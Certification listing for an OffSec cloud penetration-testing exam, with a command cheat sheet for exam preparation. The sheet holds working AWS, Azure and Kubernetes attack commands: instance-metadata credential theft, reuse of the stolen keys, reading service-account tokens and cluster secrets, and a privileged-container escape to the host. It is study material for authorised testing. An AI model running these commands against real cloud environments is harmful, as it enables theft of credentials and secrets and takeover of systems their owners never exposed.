Offensive Security Cloud Pentester

Advanced 48hr exam Pass: Passing $1,499

Cloud security assessment — AWS, Azure, GCP attack paths.

Official Page

IssuerOffSec

Format48hr exam

Duration48 hours

Pass ScorePassing

Valid For3y

Overview Syllabus (6) Tools (5) Cheat Sheets (1) Labs (1)

Cheat Sheets

Cloud Enumeration & Attack Reference

AWS Enumeration

# Identity
aws sts get-caller-identity
aws iam get-user
aws iam list-attached-user-policies --user-name 
aws iam list-user-policies --user-name 
aws iam get-policy-version --policy-arn  --version-id v1

# Enumerate all
aws iam list-users; aws iam list-roles; aws iam list-groups
aws ec2 describe-instances --query 'Reservations[*].Instances[*].[InstanceId,PublicIpAddress,Tags]' --output table
aws s3 ls; aws s3 ls s3://bucket-name --recursive
aws lambda list-functions
aws secretsmanager list-secrets; aws secretsmanager get-secret-value --secret-id

AWS IMDSv1 — Metadata Theft

# From EC2 instance (IMDSv1 — no token required)
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Returns: AccessKeyId, SecretAccessKey, Token (temporary creds)

# Configure stolen creds
aws configure set aws_access_key_id ASIA...
aws configure set aws_secret_access_key 
aws configure set aws_session_token 

# IMDSv2 (requires token)
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/

Azure Enumeration

# Login & enumerate
az login; az account list --output table
az ad user list --output table
az ad group list --output table
az role assignment list --all --output table
az keyvault list; az keyvault secret list --vault-name 
az webapp list --output table
az storage account list

# Managed Identity token (from inside Azure resource)
curl "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" -H "Metadata: true"

# ROADtools
roadrecon gather -u [email protected] -p pass
roadrecon gui  # browse at http://localhost:5000

K8s Attack Commands

# Service account token (if inside pod)
cat /var/run/secrets/kubernetes.io/serviceaccount/token
cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt

# Use token to query API
APISERVER=https://kubernetes.default.svc
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
curl $APISERVER/api/v1/namespaces/default/secrets -H "Authorization: Bearer $TOKEN" --cacert /var/run/secrets/kubernetes.io/serviceaccount/ca.crt

# Privileged container escape
# If running privileged:
fdisk -l; mkdir /mnt/host; mount /dev/sda1 /mnt/host; chroot /mnt/host bash

# kubectl (from outside)
kubectl get pods -A; kubectl get secrets -A
kubectl exec -it pod-name -- /bin/bash

Always check aws:RequestedRegion and test all regions — resources are often in us-east-1 by default but attackers leave backdoors in less-monitored regions.